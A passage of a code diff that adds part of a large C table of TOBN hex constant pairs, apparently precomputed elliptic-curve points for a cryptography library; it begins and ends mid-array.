+     TOBN(0xfcb13940, 0x5e09180d), TOBN(0x6629a6bf, 0xb47dc2dd),
+     TOBN(0xbfc55e4e, 0x9f5a915e), TOBN(0xb1db9d37, 0x6204441e),
+     TOBN(0xf82d68cf, 0x930c5f53), TOBN(0x17d3a142, 0xcbb605b1),
+     TOBN(0xdd5944ea, 0x308780f2), TOBN(0xdc8de761, 0x3845f5e4),
+     TOBN(0x6beaba7d, 0x7624d7a3), TOBN(0x1e709afd, 0x304df11e),
+     TOBN(0x95364376, 0x02170456), TOBN(0xbf204b3a, 0xc8f94b64),
+     TOBN(0x4e53af7c, 0x5680ca68), TOBN(0x0526074a, 0xe0c67574),
+     TOBN(0x95d8cef8, 0xecd92af6), TOBN(0xe6b9fa7a, 0x6cd1745a),
+     TOBN(0x3d546d3d, 0xa325c3e4), TOBN(0x1f57691d, 0x9ae93aae),
+     TOBN(0xe891f3fe, 0x9d2e1a33), TOBN(0xd430093f, 0xac063d35),
+     TOBN(0xeda59b12, 0x5513a327), TOBN(0xdc2134f3, 0x5536f18f),
+     TOBN(0xaa51fe2c, 0x5c210286), TOBN(0x3f68aaee, 0x1cab658c),
+     TOBN(0x5a23a00b, 0xf9357292), TOBN(0x9a626f39, 0x7efdabed),
+     TOBN(0xfe2b3bf3, 0x199d78e3), TOBN(0xb7a2af77, 0x71bbc345),
+     TOBN(0x3d19827a, 0x1e59802c), TOBN(0x823bbc15, 0xb487a51c),
+     TOBN(0x856139f2, 0x99d0a422), TOBN(0x9ac3df65, 0xf456c6fb),
+     TOBN(0xaddf65c6, 0x701f8bd6), TOBN(0x149f321e, 0x3758df87),
+     TOBN(0xb1ecf714, 0x721b7eba), TOBN(0xe17df098, 0x31a3312a),
+     TOBN(0xdb2fd6ec, 0xd5c4d581), TOBN(0xfd02996f, 0x8fcea1b3),
+     TOBN(0xe29fa63e, 0x7882f14f), TOBN(0xc9f6dc35, 0x07c6cadc),
+     TOBN(0x46f22d6f, 0xb882bed0), TOBN(0x1a45755b, 0xd118e52c),
+     TOBN(0x9f2c7c27, 0x7c4608cf), TOBN(0x7ccbdf32, 0x568012c2),
+     TOBN(0xfcb0aedd, 0x61729b0e), TOBN(0x7ca2ca9e, 0xf7d75dbf),
+     TOBN(0xf58fecb1, 0x6f640f62), TOBN(0xe274b92b, 0x39f51946),
+     TOBN(0x7f4dfc04, 0x6288af44), TOBN(0x0a91f32a, 0xeac329e5),
+     TOBN(0x43ad274b, 0xd6aaba31), TOBN(0x719a1640, 0x0f6884f9),
+     TOBN(0x685d29f6, 0xdaf91e20), TOBN(0x5ec1cc33, 0x27e49d52),
+     TOBN(0x38f4de96, 0x3b54a059), TOBN(0x0e0015e5, 0xefbcfdb3),
+     TOBN(0x177d23d9, 0x4dbb8da6), TOBN(0x98724aa2, 0x97a617ad),
+     TOBN(0x30f0885b, 0xfdb6558e), TOBN(0xf9f7a28a, 0xc7899a96),
+     TOBN(0xd2ae8ac8, 0x872dc112), TOBN(0xfa0642ca, 0x73c3c459),
+     TOBN(0x15296981, 0xe7dfc8d6), TOBN(0x67cd4450, 0x1fb5b94a),
+     TOBN(0x0ec71cf1, 0x0eddfd37), TOBN(0xc7e5eeb3, 0x9a8eddc7),
+     TOBN(0x02ac8e3d, 0x81d95028), TOBN(0x0088f172, 0x70b0e35d),
+     TOBN(0xec041fab, 0xe1881fe3), TOBN(0x62cf71b8, 0xd99e7faa),
+     TOBN(0x5043dea7, 0xe0f222c2), TOBN(0x309d42ac, 0x72e65142),
+     TOBN(0x94fe9ddd, 0x9216cd30), TOBN(0xd6539c7d, 0x0f87feec),
+     TOBN(0x03c5a57c, 0x432ac7d7), TOBN(0x72692cf0, 0x327fda10),
+     TOBN(0xec28c85f, 0x280698de), TOBN(0x2331fb46, 0x7ec283b1),
+     TOBN(0xd34bfa32, 0x2867e633), TOBN(0x78709a82, 0x0a9cc815),
+     TOBN(0xb7fe6964, 0x875e2fa5), TOBN(0x25cc064f, 0x9e98bfb5),
+     TOBN(0x9eb0151c, 0x493a65c5), TOBN(0x5fb5d941, 0x53182464),
+     TOBN(0x69e6f130, 0xf04618e2), TOBN(0xa8ecec22, 0xf89c8ab6),
+     TOBN(0xcd6ac88b, 0xb96209bd), TOBN(0x65fa8cdb, 0xb3e1c9e0),
+     TOBN(0xa47d22f5, 0x4a8d8eac), TOBN(0x83895cdf, 0x8d33f963),
+     TOBN(0xa8adca59, 0xb56cd3d1), TOBN(0x10c8350b, 0xdaf38232),
+     TOBN(0x2b161fb3, 0xa5080a9f), TOBN(0xbe7f5c64, 0x3af65b3a),
+     TOBN(0x2c754039, 0x97403a11), TOBN(0x94626cf7, 0x121b96af),
+     TOBN(0x431de7c4, 0x6a983ec2), TOBN(0x3780dd3a, 0x52cc3df7),
+     TOBN(0xe28a0e46, 0x2baf8e3b), TOBN(0xabe68aad, 0x51d299ae),
+     TOBN(0x603eb8f9, 0x647a2408), TOBN(0x14c61ed6, 0x5c750981),
+     TOBN(0x88b34414, 0xc53352e7), TOBN(0x5a34889c, 0x1337d46e),
+     TOBN(0x612c1560, 0xf95f2bc8), TOBN(0x8a3f8441, 0xd4807a3a),
+     TOBN(0x680d9e97, 0x5224da68), TOBN(0x60cd6e88, 0xc3eb00e9),
+     TOBN(0x3875a98e, 0x9a6bc375), TOBN(0xdc80f924, 0x4fd554c2),
+     TOBN(0x6c4b3415, 0x6ac77407), TOBN(0xa1e5ea8f, 0x25420681),
+     TOBN(0x541bfa14, 0x4607a458), TOBN(0x5dbc7e7a, 0x96d7fbf9),
+     TOBN(0x646a851b, 0x31590a47), TOBN(0x039e85ba, 0x15ee6df8),
+     TOBN(0xd19fa231, 0xd7b43fc0), TOBN(0x84bc8be8, 0x299a0e04),
+     TOBN(0x2b9d2936, 0xf20df03a), TOBN(0x24054382, 0x8608d472),
+     TOBN(0x76b6ba04, 0x9149202a), TOBN(0xb21c3831, 0x3670e7b7),
+     TOBN(0xddd93059, 0xd6fdee10), TOBN(0x9da47ad3, 0x78488e71),
+     TOBN(0x99cc1dfd, 0xa0fcfb25), TOBN(0x42abde10, 0x64696954),
+     TOBN(0x14cc15fc, 0x17eab9fe), TOBN(0xd6e863e4, 0xd3e70972),
+     TOBN(0x29a7765c, 0x6432112c), TOBN(0x88660001, 0x5b0774d8),
+     TOBN(0x3729175a, 0x2c088eae), TOBN(0x13afbcae, 0x8230b8d4),
+     TOBN(0x44768151, 0x915f4379), TOBN(0xf086431a, 0xd8d22812),
+     TOBN(0x37461955, 0xc298b974), TOBN(0x905fb5f0, 0xf8711e04),
+     TOBN(0x787abf3a, 0xfe969d18), TOBN(0x392167c2, 0x6f6a494e),
+     TOBN(0xfc7a0d2d, 0x28c511da), TOBN(0xf127c7dc, 0xb66a262d),
+     TOBN(0xf9c4bb95, 0xfd63fdf0), TOBN(0x90016589, 0x3913ef46),
+     TOBN(0x74d2a73c, 0x11aa600d), TOBN(0x2f5379bd, 0x9fb5ab52),
+     TOBN(0xe49e53a4, 0x7fb70068), TOBN(0x68dd39e5, 0x404aa9a7),
+     TOBN(0xb9b0cf57, 0x2ecaa9c3), TOBN(0xba0e103b, 0xe824826b),
+     TOBN(0x60c2198b, 0x4631a3c4), TOBN(0xc5ff84ab, 0xfa8966a2),
+     TOBN(0x2d6ebe22, 0xac95aff8), TOBN(0x1c9bb6db, 0xb5a46d09),
+     TOBN(0x419062da, 0x53ee4f8d), TOBN(0x7b9042d0, 0xbb97efef),
+     TOBN(0x0f87f080, 0x830cf6bd), TOBN(0x4861d19a, 0x6ec8a6c6),
+     TOBN(0xd3a0daa1, 0x202f01aa), TOBN(0xb0111674, 0xf25afbd5),
+     TOBN(0x6d00d6cf, 0x1afb20d9), TOBN(0x13695000, 0x40671bc5),
+     TOBN(0x913ab0dc, 0x2485ea9b), TOBN(0x1f2bed06, 0x9eef61ac),
+     TOBN(0x850c8217, 0x6d799e20), TOBN(0x93415f37, 0x3271c2de),
+     TOBN(0x5afb06e9, 0x6c4f5910), TOBN(0x688a52df, 0xc4e9e421),
+     TOBN(0x30495ba3, 0xe2a9a6db), TOBN(0x4601303d, 0x58f9268b),
+     TOBN(0xbe3b0dad, 0x7eb0f04f), TOBN(0x4ea47250, 0x4456936d),
+     TOBN(0x8caf8798, 0xd33fd3e7), TOBN(0x1ccd8a89, 0xeb433708),
+     TOBN(0x9effe3e8, 0x87fd50ad), TOBN(0xbe240a56, 0x6b29c4df),
+     TOBN(0xec4ffd98, 0xca0e7ebd), TOBN(0xf586783a, 0xe748616e),
+     TOBN(0xa5b00d8f, 0xc77baa99), TOBN(0x0acada29, 0xb4f34c9c),
+     TOBN(0x36dad67d, 0x0fe723ac), TOBN(0x1d8e53a5, 0x39c36c1e),
+     TOBN(0xe4dd342d, 0x1f4bea41), TOBN(0x64fd5e35, 0xebc9e4e0),
+     TOBN(0x96f01f90, 0x57908805), TOBN(0xb5b9ea3d, 0x5ed480dd),
+     TOBN(0x366c5dc2, 0x3efd2dd0), TOBN(0xed2fe305, 0x6e9dfa27),
+     TOBN(0x4575e892, 0x6e9197e2), TOBN(0x11719c09, 0xab502a5d),
+     TOBN(0x264c7bec, 0xe81f213f), TOBN(0x741b9241, 0x55f5c457),
+     TOBN(0x78ac7b68, 0x49a5f4f4), TOBN(0xf91d70a2, 0x9fc45b7d),
+     TOBN(0x39b05544, 0xb0f5f355), TOBN(0x11f06bce, 0xeef930d9),
+     TOBN(0xdb84d25d, 0x038d05e1), TOBN(0x04838ee5, 0xbacc1d51),
+     TOBN(0x9da3ce86, 0x9e8ee00b), TOBN(0xc3412057, 0xc36eda1f),
+     TOBN(0xae80b913, 0x64d9c2f4), TOBN(0x7468bac3, 0xa010a8ff),
+     TOBN(0xdfd20037, 0x37359d41), TOBN(0x1a0f5ab8, 0x15efeacc),
+     TOBN(0x7c25ad2f, 0x659d0ce0), TOBN(0x4011bcbb, 0x6785cff1),
+     TOBN(0x128b9912, 0x7e2192c7), TOBN(0xa549d8e1, 0x13ccb0e8),
+     TOBN(0x805588d8, 0xc85438b1), TOBN(0x5680332d, 0xbc25cb27),
+     TOBN(0xdcd1bc96, 0x1a4bfdf4), TOBN(0x779ff428, 0x706f6566),
+     TOBN(0x8bbee998, 0xf059987a), TOBN(0xf6ce8cf2, 0xcc686de7),
+     TOBN(0xf8ad3c4a, 0x953cfdb2), TOBN(0xd1d426d9, 0x2205da36),
+     TOBN(0xb3c0f13f, 0xc781a241), TOBN(0x3e89360e, 0xd75362a8),
+     TOBN(0xccd05863, 0xc8a91184), TOBN(0x9bd0c9b7, 0xefa8a7f4),
+     TOBN(0x97ee4d53, 0x8a912a4b), TOBN(0xde5e15f8, 0xbcf518fd),
+     TOBN(0x6a055bf8, 0xc467e1e0), TOBN(0x10be4b4b, 0x1587e256),
+     TOBN(0xd90c14f2, 0x668621c9), TOBN(0xd5518f51, 0xab9c92c1),
+     TOBN(0x8e6a0100, 0xd6d47b3c), TOBN(0xcbe980dd, 0x66716175),
+     TOBN(0x500d3f10, 0xddd83683), TOBN(0x3b6cb35d, 0x99cac73c),
+     TOBN(0x53730c8b, 0x6083d550), TOBN(0xcf159767, 0xdf0a1987),
+     TOBN(0x84bfcf53, 0x43ad73b3), TOBN(0x1b528c20, 0x4f035a94),
+     TOBN(0x4294edf7, 0x33eeac69), TOBN(0xb6283e83, 0x817f3240),
+     TOBN(0xc3fdc959, 0x0a5f25b1), TOBN(0xefaf8aa5, 0x5844ee22),
+     TOBN(0xde269ba5, 0xdbdde4de), TOBN(0xe3347160, 0xc56133bf),
+     TOBN(0xc1184219, 0x8d9ea9f8), TOBN(0x090de5db, 0xf3fc1ab5),
+     TOBN(0x404c37b1, 0x0bf22cda), TOBN(0x7de20ec8, 0xf5618894),
+     TOBN(0x754c588e, 0xecdaecab), TOBN(0x6ca4b0ed, 0x88342743),
+     TOBN(0x76f08bdd, 0xf4a938ec), TOBN(0xd182de89, 0x91493ccb),
+     TOBN(0xd652c53e, 0xc8a4186a), TOBN(0xb3e878db, 0x946d8e33),
+     TOBN(0x088453c0, 0x5f37663c), TOBN(0x5cd9daaa, 0xb407748b),
+     TOBN(0xa1f5197f, 0x586d5e72), TOBN(0x47500be8, 0xc443ca59),
+     TOBN(0x78ef35b2, 0xe2652424), TOBN(0x09c5d26f, 0x6dd7767d),
+     TOBN(0x7175a79a, 0xa74d3f7b), TOBN(0x0428fd8d, 0xcf5ea459),
+     TOBN(0x511cb97c, 0xa5d1746d), TOBN(0x36363939, 0xe71d1278),
+     TOBN(0xcf2df955, 0x10350bf4), TOBN(0xb3817439, 0x60aae782),
+     TOBN(0xa748c0e4, 0x3e688809), TOBN(0x98021fbf, 0xd7a5a006),
+     TOBN(0x9076a70c, 0x0e367a98), TOBN(0xbea1bc15, 0x0f62b7c2),
+     TOBN(0x2645a68c, 0x30fe0343), TOBN(0xacaffa78, 0x699dc14f),
+     TOBN(0xf4469964, 0x457bf9c4), TOBN(0x0db6407b, 0x0d2ead83),
+     TOBN(0x68d56cad, 0xb2c6f3eb), TOBN(0x3b512e73, 0xf376356c),
+     TOBN(0xe43b0e1f, 0xfce10408), TOBN(0x89ddc003, 0x5a5e257d),
+     TOBN(0xb0ae0d12, 0x0362e5b3), TOBN(0x07f983c7, 0xb0519161),
+     TOBN(0xc2e94d15, 0x5d5231e7), TOBN(0xcff22aed, 0x0b4f9513),
+     TOBN(0xb02588dd, 0x6ad0b0b5), TOBN(0xb967d1ac, 0x11d0dcd5),
+     TOBN(0x8dac6bc6, 0xcf777b6c), TOBN(0x0062bdbd, 0x4c6d1959),
+     TOBN(0x53da71b5, 0x0ef5cc85), TOBN(0x07012c7d, 0x4006f14f),
+     TOBN(0x4617f962, 0xac47800d), TOBN(0x53365f2b, 0xc102ed75),
+     TOBN(0xb422efcb, 0x4ab8c9d3), TOBN(0x195cb26b, 0x34af31c9),
+     TOBN(0x3a926e29, 0x05f2c4ce), TOBN(0xbd2bdecb, 0x9856966c),
+     TOBN(0x5d16ab3a, 0x85527015), TOBN(0x9f81609e, 0x4486c231),
+     TOBN(0xd8b96b2c, 0xda350002), TOBN(0xbd054690, 0xfa1b7d36),
+     TOBN(0xdc90ebf5, 0xe71d79bc), TOBN(0xf241b6f9, 0x08964e4e),
+     TOBN(0x7c838643, 0x2fe3cd4c), TOBN(0xe0f33acb, 0xb4bc633c),
+     TOBN(0xb4a9ecec, 0x3d139f1f), TOBN(0x05ce69cd, 0xdc4a1f49),
+     TOBN(0xa19d1b16, 0xf5f98aaf), TOBN(0x45bb71d6, 0x6f23e0ef),
+     TOBN(0x33789fcd, 0x46cdfdd3), TOBN(0x9b8e2978, 0xcee040ca),
+     TOBN(0x9c69b246, 0xae0a6828), TOBN(0xba533d24, 0x7078d5aa),
+     TOBN(0x7a2e42c0, 0x7bb4fbdb), TOBN(0xcfb4879a, 0x7035385c),
+     TOBN(0x8c3dd30b, 0x3281705b), TOBN(0x7e361c6c, 0x404fe081),
+     TOBN(0x7b21649c, 0x3f604edf), TOBN(0x5dbf6a3f, 0xe52ffe47),
+     TOBN(0xc41b7c23, 0x4b54d9bf), TOBN(0x1374e681, 0x3511c3d9),
+     TOBN(0x1863bf16, 0xc1b2b758), TOBN(0x90e78507, 0x1e9e6a96),
+     TOBN(0xab4bf98d, 0x5d86f174), TOBN(0xd74e0bd3, 0x85e96fe4),
+     TOBN(0x8afde39f, 0xcac5d344), TOBN(0x90946dbc, 0xbd91b847),
+     TOBN(0xf5b42358, 0xfe1a838c), TOBN(0x05aae6c5, 0x620ac9d8),
+     TOBN(0x8e193bd8, 0xa1ce5a0b), TOBN(0x8f710571, 0x4dabfd72),
+     TOBN(0x8d8fdd48, 0x182caaac), TOBN(0x8c4aeefa, 0x040745cf),
+     TOBN(0x73c6c30a, 0xf3b93e6d), TOBN(0x991241f3, 0x16f42011),
+     TOBN(0xa0158eea, 0xe457a477), TOBN(0xd19857db, 0xee6ddc05),
+     TOBN(0xb3265224, 0x18c41671), TOBN(0x3ffdfc7e, 0x3c2c0d58),
+     TOBN(0x3a3a5254, 0x26ee7cda), TOBN(0x341b0869, 0xdf02c3a8),
+     TOBN(0xa023bf42, 0x723bbfc8), TOBN(0x3d15002a, 0x14452691),}
+    ,
+    {TOBN(0x5ef7324c, 0x85edfa30), TOBN(0x25976554, 0x87d4f3da),
+     TOBN(0x352f5bc0, 0xdcb50c86), TOBN(0x8f6927b0, 0x4832a96c),
+     TOBN(0xd08ee1ba, 0x55f2f94c), TOBN(0x6a996f99, 0x344b45fa),
+     TOBN(0xe133cb8d, 0xa8aa455d), TOBN(0x5d0721ec, 0x758dc1f7),
+     TOBN(0x6ba7a920, 0x79e5fb67), TOBN(0xe1331feb, 0x70aa725e),
+     TOBN(0x5080ccf5, 0x7df5d837), TOBN(0xe4cae01d, 0x7ff72e21),
+     TOBN(0xd9243ee6, 0x0412a77d), TOBN(0x06ff7cac, 0xdf449025),
+     TOBN(0xbe75f7cd, 0x23ef5a31), TOBN(0xbc957822, 0x0ddef7a8),
+     TOBN(0x8cf7230c, 0xb0ce1c55), TOBN(0x5b534d05, 0x0bbfb607),
+     TOBN(0xee1ef113, 0x0e16363b), TOBN(0x27e0aa7a, 0xb4999e82),
+     TOBN(0xce1dac2d, 0x79362c41), TOBN(0x67920c90, 0x91bb6cb0),
+     TOBN(0x1e648d63, 0x2223df24), TOBN(0x0f7d9eef, 0xe32e8f28),
+     TOBN(0x6943f39a, 0xfa833834), TOBN(0x22951722, 0xa6328562),
+     TOBN(0x81d63dd5, 0x4170fc10), TOBN(0x9f5fa58f, 0xaecc2e6d),
+     TOBN(0xb66c8725, 0xe77d9a3b), TOBN(0x11235cea, 0x6384ebe0),
+     TOBN(0x06a8c118, 0x5845e24a), TOBN(0x0137b286, 0xebd093b1),
+     TOBN(0xc589e1ce, 0x44ace150), TOBN(0xe0f8d3d9, 0x4381e97c),
+     TOBN(0x59e99b11, 0x62c5a4b8), TOBN(0x90d262f7, 0xfd0ec9f9),
+     TOBN(0xfbc854c9, 0x283e13c9), TOBN(0x2d04fde7, 0xaedc7085),
+     TOBN(0x057d7765, 0x47dcbecb), TOBN(0x8dbdf591, 0x9a76fa5f),
+     TOBN(0xd0150695, 0x0de1e578), TOBN(0x2e1463e7, 0xe9f72bc6),
+     TOBN(0xffa68441, 0x1b39eca5), TOBN(0x673c8530, 0x7c037f2f),
+     TOBN(0xd0d6a600, 0x747f91da), TOBN(0xb08d43e1, 0xc9cb78e9),
+     TOBN(0x0fc0c644, 0x27b5cef5), TOBN(0x5c1d160a, 0xa60a2fd6),
+     TOBN(0xf98cae53, 0x28c8e13b), TOBN(0x375f10c4, 0xb2eddcd1),
+     TOBN(0xd4eb8b7f, 0x5cce06ad), TOBN(0xb4669f45, 0x80a2e1ef),
+     TOBN(0xd593f9d0, 0x5bbd8699), TOBN(0x5528a4c9, 0xe7976d13),
+     TOBN(0x3923e095, 0x1c7e28d3), TOBN(0xb9293790, 0x3f6bb577),
+     TOBN(0xdb567d6a, 0xc42bd6d2), TOBN(0x6df86468, 0xbb1f96ae),
+     TOBN(0x0efe5b1a, 0x4843b28e), TOBN(0x961bbb05, 0x6379b240),
+     TOBN(0xb6caf5f0, 0x70a6a26b), TOBN(0x70686c0d, 0x328e6e39),
+     TOBN(0x80da06cf, 0x895fc8d3), TOBN(0x804d8810, 0xb363fdc9),
+     TOBN(0xbe22877b, 0x207f1670), TOBN(0x9b0dd188, 0x4e615291),
+     TOBN(0x625ae8dc, 0x97a3c2bf), TOBN(0x08584ef7, 0x439b86e8),
+     TOBN(0xde7190a5, 0xdcd898ff), TOBN(0x26286c40, 0x2058ee3d),
+     TOBN(0x3db0b217, 0x5f87b1c1), TOBN(0xcc334771, 0x102a6db5),
+     TOBN(0xd99de954, 0x2f770fb1), TOBN(0x97c1c620, 0x4cd7535e),
+     TOBN(0xd3b6c448, 0x3f09cefc), TOBN(0xd725af15, 0x5a63b4f8),
+     TOBN(0x0c95d24f, 0xc01e20ec), TOBN(0xdfd37494, 0x9ae7121f),
+     TOBN(0x7d6ddb72, 0xec77b7ec), TOBN(0xfe079d3b, 0x0353a4ae),
+     TOBN(0x3066e70a, 0x2e6ac8d2), TOBN(0x9c6b5a43, 0x106e5c05),
+     TOBN(0x52d3c6f5, 0xede59b8c), TOBN(0x30d6a5c3, 0xfccec9ae),
+     TOBN(0xedec7c22, 0x4fc0a9ef), TOBN(0x190ff083, 0x95c16ced),
+     TOBN(0xbe12ec8f, 0x94de0fde), TOBN(0x0d131ab8, 0x852d3433),
+     TOBN(0x42ace07e, 0x85701291), TOBN(0x94793ed9, 0x194061a8),
+     TOBN(0x30e83ed6, 0xd7f4a485), TOBN(0x9eec7269, 0xf9eeff4d),
+     TOBN(0x90acba59, 0x0c9d8005), TOBN(0x5feca458, 0x1e79b9d1),
+     TOBN(0x8fbe5427, 0x1d506a1e), TOBN(0xa32b2c8e, 0x2439cfa7),
+     TOBN(0x1671c173, 0x73dd0b4e), TOBN(0x37a28214, 0x44a054c6),
+     TOBN(0x81760a1b, 0x4e8b53f1), TOBN(0xa6c04224, 0xf9f93b9e),
+     TOBN(0x18784b34, 0xcf671e3c), TOBN(0x81bbecd2, 0xcda9b994),
+     TOBN(0x38831979, 0xb2ab3848), TOBN(0xef54feb7, 0xf2e03c2d),
+     TOBN(0xcf197ca7, 0xfb8088fa), TOBN(0x01427247, 0x4ddc96c5),
+     TOBN(0xa2d2550a, 0x30777176), TOBN(0x53469898, 0x4d0cf71d),
+     TOBN(0x6ce937b8, 0x3a2aaac6), TOBN(0xe9f91dc3, 0x5af38d9b),
+     TOBN(0x2598ad83, 0xc8bf2899), TOBN(0x8e706ac9, 0xb5536c16),
+     TOBN(0x40dc7495, 0xf688dc98), TOBN(0x26490cd7, 0x124c4afc),
+     TOBN(0xe651ec84, 0x1f18775c), TOBN(0x393ea6c3, 0xb4fdaf4a),
+     TOBN(0x1e1f3343, 0x7f338e0d), TOBN(0x39fb832b, 0x6053e7b5),
+     TOBN(0x46e702da, 0x619e14d5), TOBN(0x859cacd1, 0xcdeef6e0),
+     TOBN(0x63b99ce7, 0x4462007d), TOBN(0xb8ab48a5, 0x4cb5f5b7),
+     TOBN(0x9ec673d2, 0xf55edde7), TOBN(0xd1567f74, 0x8cfaefda),
+     TOBN(0x46381b6b, 0x0887bcec), TOBN(0x694497ce, 0xe178f3c2),
+     TOBN(0x5e6525e3, 0x1e6266cb), TOBN(0x5931de26, 0x697d6413),
+     TOBN(0x87f8df7c, 0x0e58d493), TOBN(0xb1ae5ed0, 0x58b73f12),
+     TOBN(0xc368f784, 0xdea0c34d), TOBN(0x9bd0a120, 0x859a91a0),
+     TOBN(0xb00d88b7, 0xcc863c68), TOBN(0x3a1cc11e, 0x3d1f4d65),
+     TOBN(0xea38e0e7, 0x0aa85593), TOBN(0x37f13e98, 0x7dc4aee8),
+     TOBN(0x10d38667, 0xbc947bad), TOBN(0x738e07ce, 0x2a36ee2e),
+     TOBN(0xc93470cd, 0xc577fcac), TOBN(0xdee1b616, 0x2782470d),
+     TOBN(0x36a25e67, 0x2e793d12), TOBN(0xd6aa6cae, 0xe0f186da),
+     TOBN(0x474d0fd9, 0x80e07af7), TOBN(0xf7cdc47d, 0xba8a5cd4),
+     TOBN(0x28af6d9d, 0xab15247f), TOBN(0x7c789c10, 0x493a537f),
+     TOBN(0x7ac9b110, 0x23a334e7), TOBN(0x0236ac09, 0x12c9c277),
+     TOBN(0xa7e5bd25, 0x1d7a5144), TOBN(0x098b9c2a, 0xf13ec4ec),
+     TOBN(0x3639daca, 0xd3f0abca), TOBN(0x642da81a, 0xa23960f9),
+     TOBN(0x7d2e5c05, 0x4f7269b1), TOBN(0xfcf30777, 0xe287c385),
+     TOBN(0x10edc84f, 0xf2a46f21), TOBN(0x35441757, 0x4f43fa36),
+     TOBN(0xf1327899, 0xfd703431), TOBN(0xa438d7a6, 0x16dd587a),
+     TOBN(0x65c34c57, 0xe9c8352d), TOBN(0xa728edab, 0x5cc5a24e),
+     TOBN(0xaed78abc, 0x42531689), TOBN(0x0a51a0e8, 0x010963ef),
+     TOBN(0x5776fa0a, 0xd717d9b3), TOBN(0xf356c239, 0x7dd3428b),
+     TOBN(0x29903fff, 0x8d3a3dac), TOBN(0x409597fa, 0x3d94491f),
+     TOBN(0x4cd7a5ff, 0xbf4a56a4), TOBN(0xe5096474, 0x8adab462),
+     TOBN(0xa97b5126, 0x5c3427b0), TOBN(0x6401405c, 0xd282c9bd),
+     TOBN(0x3629f8d7, 0x222c5c45), TOBN(0xb1c02c16, 0xe8d50aed),
+     TOBN(0xbea2ed75, 0xd9635bc9), TOBN(0x226790c7, 0x6e24552f),
+     TOBN(0x3c33f2a3, 0x65f1d066), TOBN(0x2a43463e, 0x6dfccc2e),
+     TOBN(0x8cc3453a, 0xdb483761), TOBN(0xe7cc6085, 0x65d5672b),
+     TOBN(0x277ed6cb, 0xde3efc87), TOBN(0x19f2f368, 0x69234eaf),
+     TOBN(0x9aaf4317, 0x5c0b800b), TOBN(0x1f1e7c89, 0x8b6da6e2),
+     TOBN(0x6cfb4715, 0xb94ec75e), TOBN(0xd590dd5f, 0x453118c2),
+     TOBN(0x14e49da1, 0x1f17a34c), TOBN(0x5420ab39, 0x235a1456),
+     TOBN(0xb7637241, 0x2f50363b), TOBN(0x7b15d623, 0xc3fabb6e),
+     TOBN(0xa0ef40b1, 0xe274e49c), TOBN(0x5cf50744, 0x96b1860a),
+     TOBN(0xd6583fbf, 0x66afe5a4), TOBN(0x44240510, 0xf47e3e9a),
+     TOBN(0x99254343, 0x11b2d595), TOBN(0xf1367499, 0xeec8df57),
+     TOBN(0x3cb12c61, 0x3e73dd05), TOBN(0xd248c033, 0x7dac102a),
+     TOBN(0xcf154f13, 0xa77739f5), TOBN(0xbf4288cb, 0x23d2af42),
+     TOBN(0xaa64c9b6, 0x32e4a1cf), TOBN(0xee8c07a8, 0xc8a208f3),
+     TOBN(0xe10d4999, 0x6fe8393f), TOBN(0x0f809a3f, 0xe91f3a32),
+     TOBN(0x61096d1c, 0x802f63c8), TOBN(0x289e1462, 0x57750d3d),
+     TOBN(0xed06167e, 0x9889feea), TOBN(0xd5c9c0e2, 0xe0993909),
+     TOBN(0x46fca0d8, 0x56508ac6), TOBN(0x91826047, 0x4f1b8e83),
+     TOBN(0x4f2c877a, 0x9a4a2751), TOBN(0x71bd0072, 0xcae6fead),
+     TOBN(0x38df8dcc, 0x06aa1941), TOBN(0x5a074b4c, 0x63beeaa8),
+     TOBN(0xd6d65934, 0xc1cec8ed), TOBN(0xa6ecb49e, 0xaabc03bd),
+     TOBN(0xaade91c2, 0xde8a8415), TOBN(0xcfb0efdf, 0x691136e0),
+     TOBN(0x11af45ee, 0x23ab3495), TOBN(0xa132df88, 0x0b77463d),
+     TOBN(0x8923c15c, 0x815d06f4), TOBN(0xc3ceb3f5, 0x0d61a436),
+     TOBN(0xaf52291d, 0xe88fb1da), TOBN(0xea057974, 0x1da12179),
+     TOBN(0xb0d7218c, 0xd2fef720), TOBN(0x6c0899c9, 0x8e1d8845),
+     TOBN(0x98157504, 0x752ddad7), TOBN(0xd60bd74f, 0xa1a68a97),
+     TOBN(0x7047a3a9, 0xf658fb99), TOBN(0x1f5d86d6, 0x5f8511e4),
+     TOBN(0xb8a4bc42, 0x4b5a6d88), TOBN(0x69eb2c33, 0x1abefa7d),
+     TOBN(0x95bf39e8, 0x13c9c510), TOBN(0xf571960a, 0xd48aab43),
+     TOBN(0x7e8cfbcf, 0x704e23c6), TOBN(0xc71b7d22, 0x28aaa65b),
+     TOBN(0xa041b2bd, 0x245e3c83), TOBN(0x69b98834, 0xd21854ff),
+     TOBN(0x89d227a3, 0x963bfeec), TOBN(0x99947aaa, 0xde7da7cb),
+     TOBN(0x1d9ee9db, 0xee68a9b1), TOBN(0x0a08f003, 0x698ec368),
+     TOBN(0xe9ea4094, 0x78ef2487), TOBN(0xc8d2d415, 0x02cfec26),
+     TOBN(0xc52f9a6e, 0xb7dcf328), TOBN(0x0ed489e3, 0x85b6a937),
+     TOBN(0x9b94986b, 0xbef3366e), TOBN(0x0de59c70, 0xedddddb8),
+     TOBN(0xffdb748c, 0xeadddbe2), TOBN(0x9b9784bb, 0x8266ea40),
+     TOBN(0x142b5502, 0x1a93507a), TOBN(0xb4cd1187, 0x8d3c06cf),
+     TOBN(0xdf70e76a, 0x91ec3f40), TOBN(0x484e81ad, 0x4e7553c2),
+     TOBN(0x830f87b5, 0x272e9d6e), TOBN(0xea1c93e5, 0xc6ff514a),
+     TOBN(0x67cc2adc, 0xc4192a8e), TOBN(0xc77e27e2, 0x42f4535a),
+     TOBN(0x9cdbab36, 0xd2b713c5), TOBN(0x86274ea0, 0xcf7b0cd3),
+     TOBN(0x784680f3, 0x09af826b), TOBN(0xbfcc837a, 0x0c72dea3),
+     TOBN(0xa8bdfe9d, 0xd6529b73), TOBN(0x708aa228, 0x63a88002),
+     TOBN(0x6c7a9a54, 0xc91d45b9), TOBN(0xdf1a38bb, 0xfd004f56),
+     TOBN(0x2e8c9a26, 0xb8bad853), TOBN(0x2d52cea3, 0x3723eae7),
+     TOBN(0x054d6d81, 0x56ca2830), TOBN(0xa3317d14, 0x9a8dc411),
+     TOBN(0xa08662fe, 0xfd4ddeda), TOBN(0xed2a153a, 0xb55d792b),
+     TOBN(0x7035c16a, 0xbfc6e944), TOBN(0xb6bc5834, 0x00171cf3),
+     TOBN(0xe27152b3, 0x83d102b6), TOBN(0xfe695a47, 0x0646b848),
+     TOBN(0xa5bb09d8, 0x916e6d37), TOBN(0xb4269d64, 0x0d17015e),
+     TOBN(0x8d8156a1, 0x0a1d2285), TOBN(0xfeef6c51, 0x46d26d72),
